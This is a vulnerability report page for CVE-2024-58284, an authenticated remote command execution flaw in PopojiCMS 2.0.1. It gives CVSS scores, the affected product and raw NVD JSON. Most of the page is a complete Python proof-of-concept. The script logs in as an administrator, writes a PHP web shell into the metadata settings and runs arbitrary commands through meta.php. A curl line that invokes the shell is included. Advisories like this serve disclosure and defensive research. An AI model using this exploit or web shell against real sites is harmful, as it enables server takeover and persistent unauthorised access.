Security Vulnerability Report
CVE-2024-58284 CVSS 7.2 HIGH

CVE-2024-58284

Published: 2025-12-10 22:16:20
Last Modified: 2025-12-19 17:42:25

Description

PopojiCMS 2.0.1 contains an authenticated remote command execution vulnerability that allows administrative users to inject malicious PHP code through the metadata settings endpoint. Attackers can log in and modify the meta content to create a web shell that executes arbitrary system commands through a GET parameter.

CVSS Details

CVSS Score
7.2 (CVSS v3.1, NVD primary metric; the raw JSON below also records a CVSS v4.0 base score of 8.6 HIGH from the same source)
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:popojicms:popojicms:2.0.1:*:*:*:*:*:*:* - VULNERABLE
PopojiCMS 2.0.1 (the only CPE match listed; the PoC header says "<= 2.0.1", so earlier releases may also be affected, but no CPE range confirms that)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that it needs valid admin credentials (CVSS PR:H) and plants a persistent PHP web shell on the target (the PoC expects it at /po-admin/config/meta.php); restore the original meta content after testing.
python
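# CVE-2024-58284 PopojiCMS 2.0.1 Authenticated RCE PoC
# Target: PopojiCMS <= 2.0.1
# Author: VulnCheck
#
# Flow: log in to the admin panel, write a PHP one-liner into the metadata
# settings, then request the file the CMS writes that content to. Requires
# admin credentials (CVSS PR:H) and leaves a persistent web shell on the
# target until the meta content is restored -- clean up after testing.
import sys

import requests

# Per-request timeout so an unresponsive host fails fast instead of hanging
# the whole run (the original PoC had no timeout at all).
REQUEST_TIMEOUT = 15

# PHP one-liner written into the meta content; `cmd` is read from the
# query string of the resulting file.
payload = "<?php system($_GET['cmd']); ?>"


def _base(target):
    """Strip a trailing slash so URL building does not produce '//'."""
    return target.rstrip("/")


def login(target, username, password):
    """Authenticate against /po-admin/login.php and return the session.

    Args:
        target: Base URL of the PopojiCMS install (e.g. http://host).
        username: Admin username.
        password: Admin password.

    Returns:
        A ``requests.Session`` holding the admin cookies, or ``None`` when
        the response does not look like a successful login.
    """
    session = requests.Session()
    login_url = f"{_base(target)}/po-admin/login.php"
    response = session.post(
        login_url,
        data={"username": username, "password": password},
        timeout=REQUEST_TIMEOUT,
    )
    # NOTE(review): substring heuristic carried over from the original PoC;
    # a login that succeeds via a redirect without the word "success" in the
    # body would be reported as a failure -- verify against a real target.
    if "success" in response.text.lower():
        return session
    return None


def inject_payload(session, target, payload):
    """POST the PHP payload to the metadata settings endpoint.

    Both ``content`` and ``meta_content`` are sent because the original PoC
    sends both; which field the CMS actually persists is not verified here.

    Args:
        session: Authenticated session from :func:`login`.
        target: Base URL of the PopojiCMS install.
        payload: PHP source to store as the meta content.

    Returns:
        The ``requests.Response`` so the caller can inspect the status.
    """
    inject_url = f"{_base(target)}/po-admin/Component.php?string=setting"
    data = {"content": payload, "meta_content": payload}
    return session.post(inject_url, data=data, timeout=REQUEST_TIMEOUT)


def execute_command(target, cmd):
    """Run ``cmd`` through the planted web shell and return the response body.

    The shell is requested without the admin session: the PoC assumes
    /po-admin/config/meta.php is reachable unauthenticated once written.
    """
    webshell_url = f"{_base(target)}/po-admin/config/meta.php"
    response = requests.get(
        webshell_url, params={"cmd": cmd}, timeout=REQUEST_TIMEOUT
    )
    return response.text


def main(argv):
    """CLI entry point: ``python poc.py <target> <username> <password> [cmd]``.

    Returns a process exit code (0 success, 1 failure, 2 usage error).
    The password is taken from argv for parity with the original PoC; be
    aware it is visible in the process list on the testing host.
    """
    if len(argv) < 4:
        print(f"Usage: {argv[0]} <target_url> <username> <password> [command]")
        print("[*] Example: python poc.py http://target.com admin password")
        return 2
    target, username, password = argv[1:4]
    # Optional 4th argument runs a command immediately via execute_command,
    # which the original script defined but never called.
    cmd = argv[4] if len(argv) > 4 else None

    print("[*] Logging in as admin...")
    session = login(target, username, password)
    if session is None:
        print("[-] Login failed!")
        return 1
    print("[+] Login successful!")

    print("[*] Injecting malicious payload...")
    response = inject_payload(session, target, payload)
    # A non-2xx answer means the settings write was rejected; do not report
    # success in that case. (A 200 does not prove the file was written --
    # the CMS may still answer 200 on a failed save.)
    if not response.ok:
        print(f"[-] Injection request returned HTTP {response.status_code}")
        return 1
    print("[+] Payload injected! Webshell created at /po-admin/config/meta.php")

    if cmd is not None:
        print(f"[*] Executing: {cmd}")
        print(execute_command(target, cmd))
    else:
        print("[*] Example: python poc.py http://target.com admin password")
        print("[*] Execute command: curl 'http://target.com/po-admin/config/meta.php?cmd=whoami'")
    print("[!] Restore the original meta content afterwards to remove the shell.")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))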

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-58284", "sourceIdentifier": "[email protected]", "published": "2025-12-10T22:16:20.420", "lastModified": "2025-12-19T17:42:24.517", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PopojiCMS 2.0.1 contains an authenticated remote command execution vulnerability that allows administrative users to inject malicious PHP code through the metadata settings endpoint. Attackers can log in and modify the meta content to create a web shell that executes arbitrary system commands through a GET parameter."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:popojicms:popojicms:2.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "2215DA94-615C-4B2C-BCC4-4497C233208C"}]}]}], "references": [{"url": "https://github.com/PopojiCMS/PopojiCMS", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.exploit-db.com/exploits/52022", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.popojicms.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/popojicms-remote-command-execution-via-authenticated-metadata-settings", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Release Notes"]}]}}